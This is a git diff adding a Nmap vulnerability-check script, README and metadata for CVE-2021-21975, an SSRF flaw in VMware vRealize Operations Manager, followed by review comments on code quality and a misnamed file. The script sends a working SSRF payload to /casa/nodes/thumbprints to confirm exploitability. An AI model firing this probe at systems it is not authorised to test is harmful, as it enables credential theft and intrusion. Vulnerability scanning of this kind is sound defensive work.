diff --git a/cve/vmware/2021/CVE-2021-21975/113367112-8fca1c00-9331-11eb-918a-18cd14ef0e8e.gif b/cve/vmware/2021/CVE-2021-21975/113367112-8fca1c00-9331-11eb-918a-18cd14ef0e8e.gif
new file mode 100644
index 0000000000000000000000000000000000000000..5289bc1d34503cff9dd845edcddbd4f2a3302c08
Binary files /dev/null and b/cve/vmware/2021/CVE-2021-21975/113367112-8fca1c00-9331-11eb-918a-18cd14ef0e8e.gif differ
diff --git a/cve/vmware/2021/CVE-2021-21975/README.md b/cve/vmware/2021/CVE-2021-21975/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..852561d4360b0a5c7972faeb1e8d7906294a166a
--- /dev/null
+++ b/cve/vmware/2021/CVE-2021-21975/README.md
@@ -0,0 +1,17 @@
+# CVE-2021-21975
+Nmap script to check vulnerability CVE-2021-21975
+
+## Vulnerability References:
+
+https://app.howlermonkey.io/vulnerabilities/CVE-2021-21975
+
+https://www.vmware.com/security/advisories/VMSA-2021-0004.html
+
+## Blog
+https://www.guayoyo.io/post/cve-2021-21975-vmware-vrealize-operations-manager-ssrf-lo-que-necesitas-saber
+
+## Example
+
+nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
+
+![CVE-2021-21975](113367112-8fca1c00-9331-11eb-918a-18cd14ef0e8e.gif)
diff --git a/cve/vmware/2021/CVE-2021-21975/cve-2021-21975.nse b/cve/vmware/2021/CVE-2021-21975/cve-2021-21975.nse
new file mode 100644
index 0000000000000000000000000000000000000000..3b03c28b1922f4976785d73c99dd253269867958
--- /dev/null
+++ b/cve/vmware/2021/CVE-2021-21975/cve-2021-21975.nse
@@ -0,0 +1,103 @@
+description = [[
+VMware vRealize Operations Manager CVE-2021-21975 SSRF Vulnerability - Check
+
+Este script de Nmap busca verificar la vulnerabilidad CVE-2021-21975 en la siguiente ruta
+"/casa/nodes/thumbprints" mediante una solicitud POST e interpretando la
+respuesta HTTP 200. Si se encuentran las palabras "vRealize Operations Manager", "thumbprint" y "address"
+significa que vRealize Operations Manager es vulnerable a SSRF.
+
+References:
+https://app.howlermonkey.io/vulnerabilities/CVE-2021-21975
+https://www.vmware.com/security/advisories/VMSA-2021-0004.html
+]]
+
+---
+-- @usage
+-- nmap -p443 --script CVE-2021-21975.nse
+-- @output
+-- PORT STATE SERVICE
+-- 443/tcp open https
+-- | CVE-2021-21975:
+-- | VULNERABLE:
+-- | VMware vRealize Operations Manager 7.0.0, 7.5.0, 8.0.0, 8.0.1, 8.1.0, 8.1.1, 8.2.0, 8.3.0 - SSRF
+-- | State: VULNERABLE (Exploitable)
+-- | IDs: CVE:CVE-2021-21975
+-- | Risk factor: HIGH CVSS: 8.6
+-- | Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the
+-- | vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.
+-- | Disclosure date: 2021-03-30
+-- | References:
+-- | https://app.howlermonkey.io/vulnerabilities/CVE-2021-21975
+-- |_ https://www.vmware.com/security/advisories/VMSA-2021-0004.html
+
+
+author = "Edgar Salazar "
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"vuln", "exploit"}
+
+local shortport = require "shortport"
+local http = require "http"
+local stdnse = require "stdnse"
+local string = require "string"
+local vulns = require "vulns"
+
+portrule = shortport.http
+
+action = function(host, port)
+
+ local vuln = {
+ title = "VMware vRealize Operations Manager 7.0.0, 7.5.0, 8.0.0, 8.0.1, 8.1.0, 8.1.1, 8.2.0, 8.3.0 - SSRF",
+ state = vulns.STATE.NOT_VULN,
+ risk_factor = "HIGH",
+ scores = {
+ CVSS = "8.6",
+ },
+ IDS = { CVE = 'CVE-2021-21975' },
+ description = [[
+ Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the
+ vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.
+ ]],
+ references = {
+ 'https://app.howlermonkey.io/vulnerabilities/CVE-2021-21975',
+ 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'
+ },
+ dates = {
+ disclosure = {year = '2021', month = '03', day = '30'},
+ },
+ }
+
+ local report = vulns.Report:new(SCRIPT_NAME, host, port)
+ local uri = "/casa/nodes/thumbprints"
+ local PAYLOAD_JSON = [=[["127.0.0.1:443/ui/"]]=]
+ local options = {header={}}
+ options["header"]["Host"] = 'action'
+ options["header"]["Content-Type"] = 'application/json'
+ options["header"]["User-Agent"] = 'Guayoyo - Mozilla/5.0 (compatible; vCenter)'
+
+ vuln.state = vulns.STATE.NOT_VULN
+
+ local response = http.post(host, port, uri, options, nil, PAYLOAD_JSON)
+
+ if response.status == 200 and
+ string.find(response.body, "vRealize Operations Manager") and
+ string.find(response.body, "thumbprint") and
+ string.find(response.body, "address") then
+ vuln.state = vulns.STATE.EXPLOIT
+ else
+ uri = "/ui/login.action"
+ options = {header={}}
+ options["header"]["Host"] = 'action'
+ options["header"]["Accept"] = 'text/html,application/xhtml+xml,application/xml'
+ options["header"]["User-Agent"] = 'Guayoyo - Mozilla/5.0 (compatible; vCenter)'
+ response = http.get(host, port, uri, options)
+ if response.status == 200 and (
+ string.find(response.body, "version=7.0.0") or string.find(response.body, "version=7.5.0") or
+ string.find(response.body, "version=8.0.0") or string.find(response.body, "version=8.0.1") or
+ string.find(response.body, "version=8.0.0") or string.find(response.body, "version=8.1.0") or
+ string.find(response.body, "version=8.1.1") or string.find(response.body, "version=8.2.0") or
+ string.find(response.body, "version=8.3.0")) then
+ vuln.state = vulns.STATE.LIKELY_VULN
+ end
+ end
+ return report:make_output (vuln)
+end
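Review bot: The version fallback in the `else` branch near the end of the hunk passes the version strings to `string.find` as Lua patterns, so the `.` in `"version=8.0.0"` matches any character and the check is looser than the literal match the `description` promises; use a plain search, `string.find(response.body, "version=8.0.0", 1, true)`. The same `or` chain lists `"version=8.0.0"` twice, and the duplication disappears if the affected versions are kept in a table and looped over, as below. Two smaller points in the same hunk: `local stdnse = require "stdnse"` is never used, and `vuln.state = vulns.STATE.NOT_VULN` is assigned both in the table constructor and again before the POST, so one of the two can go. Both requests send `Host: action` instead of the target's name; if that is deliberate it deserves a one-line comment such as `-- Host header intentionally fixed to "action"; TODO document why` since a reader cannot tell it from a leftover.
```lua
    -- … unchanged: headers for the /ui/login.action request and http.get …
    -- Plain search (4th arg true): "." in the version strings must not act as a pattern wildcard.
    local affected = {"7.0.0", "7.5.0", "8.0.0", "8.0.1", "8.1.0", "8.1.1", "8.2.0", "8.3.0"}
    if response.status == 200 then
      for _, v in ipairs(affected) do
        if string.find(response.body, "version=" .. v, 1, true) then
          vuln.state = vulns.STATE.LIKELY_VULN
          break
        end
      end
    end
```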
diff --git a/cve/vmware/2021/yaml/CVE-2019-12735.yaml b/cve/vmware/2021/yaml/CVE-2019-12735.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..ee2ceba87124a9048f7c92cbf3044875d0ec6bd1
--- /dev/null
+++ b/cve/vmware/2021/yaml/CVE-2019-12735.yaml
@@ -0,0 +1,20 @@
+id: CVE-2021-21975
+source: https://github.com/GuayoyoCyber/CVE-2021-21975
+info:
+ name: Vmware是一款虚拟机软件。
+ severity: high
+ description: |
+ vRealize Operations Manager API 8.4之前版本存在服务器端请求伪造,可能允许有网络访问权的攻击者发起SSRF以窃取管理凭证。
+ scope-of-influence:
+ vmware vRealize Operations Manager API < 8.4
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-21975
+ - https://www.vmware.com/security/advisories/VMSA-2021-0004.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-21975
+ cwe-id: CWE-918
+ cnvd-id: None
+ kve-id: None
+ tags: SSRF, cve2021
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index a9f9109b0065f24811326d3a98661d801bc079fa..db0e269f2d757e8a73cb0d9d6af5f35a7f691f1f 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -127,6 +127,8 @@ cve:
 - CVE-2023-1170
 - CVE-2023-1175
 - CVE-2023-1264
+ vmware:
+ - CVE-2021-21975
 openssl:
 - CVE-2022-1292
 - CVE-2022-2274
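Review bot: The new file is named `CVE-2019-12735.yaml` but its `id:` and `cve-id:` fields both say `CVE-2021-21975`, and the `openkylin_list.yaml` hunk in the same commit registers `CVE-2021-21975` under `vmware`, so the filename looks like a copy-paste leftover and should be `CVE-2021-21975.yaml`. The `cvss-score: 7.5` here also disagrees with the `CVSS = "8.6"` that the `.nse` script and its `@output` report; the vector on this line (`AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`) does score 7.5, so the two files presumably take their number from different sources (NVD versus the vendor advisory), and a short note saying which source each uses would stop the next reader from "fixing" one to match the other. The file is also missing its trailing newline.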